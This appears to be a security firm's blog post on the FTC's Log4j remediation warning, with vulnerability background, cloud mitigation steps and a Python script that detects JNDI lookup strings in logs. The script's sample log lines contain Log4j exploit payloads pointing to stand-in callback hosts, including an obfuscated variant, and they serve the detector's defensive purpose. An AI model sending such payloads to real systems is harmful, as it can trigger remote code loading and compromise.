On 4 January 2022, the FTC published a blog post on its website warning organizations to remediate Log4j vulnerabilities found in their systems as soon as possible. The FTC warns organizations of the consequences of ignoring this vulnerability, including loss of personal information, financial loss, and other irreversible impacts. The FTC goes on to remind organizations that under the Federal Trade Commission Act and the Gramm-Leach-Bliley Act, organizations are compelled to remediate known vulnerabilities. Certainly, there are other compelling regulations, such as the FTC Safeguards Rule for non-banking financial institutions, that require organizations to act on known vulnerabilities.
The FTC warning goes on to point to the Cybersecurity and Infrastructure Security Agency (CISA) Apache Log4j Vulnerability Guidance webpage. This guidance provides a summary of the Log4j vulnerability and helpful resources for organizations looking to respond to the vulnerability. CISA encourages those affected to report any compromises to both the FBI and CISA immediately.
In the blog post, the FTC recalls the example of Equifax, which failed to patch a known vulnerability and exposed the personal data of 147 million consumers. Equifax went on to pay $700 million in fines to the federal government and all 50 states.
If your organization is not yet aware of its regulatory obligations, please visit OCD Tech’s webpage for government compliance services and learn more about the types of regulations that might impact your organization and how OCD Tech may be able to help.
Background on the Log4j Vulnerability
A major vulnerability in Apache Log4j, a widely used logging library, is being actively exploited, affecting hundreds of millions of devices. Log4j is an open-source Java component used to record users’ activities and the behavior of software for later review. A malicious actor can exploit this vulnerability by sending a specially crafted string that gets logged by Log4j, potentially allowing the attacker to take over the device or infect it with malware. Attackers taking advantage of the vulnerability have used it to deploy crypto-miners, botnets, and ransomware.
After the vulnerability was officially announced on 10 December 2021, attacks increased significantly. The vulnerability is believed to have been exploited in the wild since the beginning of December and is expected to have a lasting impact across the internet for years. What makes this vulnerability particularly dangerous is the large number of applications that incorporate Log4j. Unexpected applications often contain the component, and many third parties may not even be aware they are using it, which slows down patching efforts.
Major tech companies and cloud providers such as Apple, Amazon, IBM, and Google acknowledged that some of their services were susceptible to this exploit. In cloud environments, it is imperative to understand that an attacker who gains access to a host can escalate to every identity attached to that host. The potential for data breaches from the Log4j exploit is high, which should make users of cloud products wary. If you contract Software as a Service or run a cloud vendor’s product through a web interface, contact the vendor for more information, including an update on how they are handling the vulnerability.
Here are a few steps to ensure your cloud environment is secure:
- Prioritize patching based on the criticality of resources that are necessary for daily function
- Until patches are applied, set log4j2.formatMsgNoLookups to true by adding -Dlog4j2.formatMsgNoLookups=true to the Java Virtual Machine command line used to start your application (for versions 2.10 and above)
- Utilize application tagging capabilities to identify unpatched applications for more strict access policies
- Enable multifactor authentication so that a compromised password alone is not enough to gain access
- Restrict access of resources to trusted locations only
- Run vulnerability scans with the most recent signatures
- Utilize threat hunting and logging tools to look at historical data and determine if exploitation was attempted
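As an added example for the last step (not code from the original post or from OCD Tech), the following Python script scans historical web-server log lines for Log4j JNDI lookup strings, collapsing nested lookups such as ${lower:...} and ${::-...} so that obfuscated attempts are also reported. The log lines, hosts, and callback addresses are constructed for the example.

```python
import re
from typing import Dict, List

# Constructed sample access-log lines (not from the original post); the
# 198.51.100.0/24 callback addresses are documentation ranges, not real systems.
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Dec/2021:12:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:01:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:01:09 +0000] "GET /?q=${${lower:j}ndi:rmi://198.51.100.7/x} HTTP/1.1" 404 0 "-" "curl/7.79"',
]

# Innermost Log4j lookup that is not itself a jndi lookup: ${prefix:value}
INNER_LOOKUP = re.compile(r"\$\{(?![jJ][nN][dD][iI]:)([^{}:]*):([^{}]*)\}")
# A (normalized) jndi lookup: capture the protocol and the callback host
JNDI = re.compile(r"\$\{jndi:([a-z]+)://([^/}]+)", re.IGNORECASE)


def _resolve(match: re.Match) -> str:
    """Evaluate one nested lookup the way Log4j would (lower/upper/default value)."""
    prefix, value = match.group(1).lower(), match.group(2)
    # ${x:-default} and ${::-j} style lookups evaluate to the text after ':-'
    if ":-" in value:
        value = value.rsplit(":-", 1)[1]
    if prefix == "lower":
        return value.lower()
    if prefix == "upper":
        return value.upper()
    return value


def normalize(text: str, max_depth: int = 10) -> str:
    """Collapse nested lookups so obfuscated payloads read as plain ${jndi:...}."""
    for _ in range(max_depth):
        collapsed = INNER_LOOKUP.sub(_resolve, text)
        if collapsed == text:
            break
        text = collapsed
    return text


def find_jndi_attempts(lines: List[str]) -> List[Dict[str, str]]:
    """Return one finding per log line that carries a JNDI lookup string."""
    findings = []
    for line in lines:
        match = JNDI.search(normalize(line))
        if match:
            findings.append({"line": line, "scheme": match.group(1).lower(), "callback": match.group(2)})
    return findings


if __name__ == "__main__":
    for hit in find_jndi_attempts(SAMPLE_LOGS):
        print(f"{hit['scheme']} lookup to {hit['callback']}: {hit['line']}")
```

Any hit is a reason to check whether the application in question ran a vulnerable Log4j version at that time and whether the host made outbound connections to the callback address.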
Without a comprehensive inventory of all the programs on a network, it is difficult to track these insecure devices down. Fortunately, the remote code execution vulnerability is already patched in the latest Log4j update, which should be applied immediately. Numerous vendor-specific mitigation recommendations are available and should be followed.
Click here to learn more about our FTC Safeguards Virtual CISO.